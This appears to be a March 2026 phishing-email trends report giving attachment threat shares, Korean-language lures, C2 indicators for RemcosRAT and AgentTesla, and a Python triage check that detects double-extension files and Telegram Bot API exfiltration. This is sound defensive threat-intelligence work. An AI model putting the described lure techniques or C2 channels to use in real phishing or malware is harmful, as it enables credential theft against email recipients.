March 2026 Phishing Email Trends Report
Statistics on Attachment Threat Types.
- Trojans accounted for the largest share of attachment-based threats in March 2026 at 21%.
- Phishing (FakePage) came in at 15%: its share fell significantly month over month, from 42% to 15%, but its volume decreased only slightly.
- Downloaders were identified at 9% and droppers at 7%.
- Trojans continue to circulate as variants that use double extensions and legitimate-looking file names to entice execution.
- Phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead users to fake sites.
Attachment file extension statistics.
- The script category is dominated by HTML at 14% and JS at 11%.
- Among compressed files, ZIP was 14%, RAR 8%, and 7Z 5%.
- For document files, PDF was 13%, XLS 5%, and DOCX 2%.
- compared to the previous month, Script-type malware distribution increased significantly, while Trojan distribution increased slightly.
- Droppers and Downloaders decreased slightly, while Compress and Document types increased slightly.
Phishing email lists distributed in Korean.
- Many emails impersonating courier, financial, and tax-invoice messages from FedEx, DHL, and Hana Bank were detected.
- In the Script type case, the email impersonated Woori Bank and induced the user to enter login information on the phishing page; a Telegram API call token was used as the C2.
- In the Document type case, executing a PDF disguised as coming from an industrial equipment supplier led to RemcosRAT distribution and information theft; the C2 was identified as controller.airdns.org:45177.
- In the Compress type case, AgentTesla was distributed when an attachment impersonating a textile exporter was decompressed and executed; an external mail server and a suspicious address were used as the C2.
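A triage check for two of the lures described above (double-extension trojans and HTML/JS attachments that call the Telegram API), as an added example that is not part of the original report. The extension sets, the function name and the sample attachments are assumptions constructed for illustration.

```python
import re

# Assumed extension sets (not from the report): what runs on double-click,
# and what is commonly placed in front of it as a decoy.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "lnk"}
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
SCRIPT_EXTS = {"html", "htm", "js"}

# Telegram Bot API calls have the form https://api.telegram.org/bot<token>/<method>
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot[^/\s\"']+/(\w+)", re.IGNORECASE)


def triage_attachment(filename, content=""):
    """Return a list of finding strings for one mail attachment."""
    findings = []
    # Strip padding around each dot-separated part: "a.pdf      .exe" hides
    # the real extension behind whitespace in many mail clients.
    parts = [p.strip() for p in filename.lower().split(".") if p.strip()]
    ext = parts[-1] if len(parts) > 1 else ""

    if len(parts) >= 3 and ext in EXEC_EXTS and parts[-2] in DECOY_EXTS:
        findings.append(f"double_extension:{parts[-2]}.{ext}")

    if ext in SCRIPT_EXTS:
        # Report the API method only; the token is a secret and stays out of logs.
        for method in sorted(set(TELEGRAM_RE.findall(content))):
            findings.append(f"telegram_bot_api:{method}")
    return findings


# Constructed samples (not taken from the report).
SAMPLES = [
    ("Tax_Invoice.pdf.exe", ""),
    ("Shipping_Label.pdf      .scr", ""),
    ("login.html",
     '<script>fetch("https://api.telegram.org/bot0000:PLACEHOLDER/sendMessage")</script>'),
    ("Quarterly_Report.v2.pdf", ""),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        print(f"{name!r}: {triage_attachment(name, body) or 'clean'}")
```

The content check only matches a Telegram URL that appears in plain text; an encoded or obfuscated attachment needs decoding before this check is meaningful.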
Indicators of Compromise (IoC).
- A list of the top 30 MD5 hashes of the collected malware files was provided.
- Relevant C2 and token examples included Telegram API calls, controller.airdns.org:45177, and ccp11nl.hyperhost.ua:587.
- The report synthesizes the trends of HTML-based phishing, document-compressed file induced execution, and remote control malware distribution.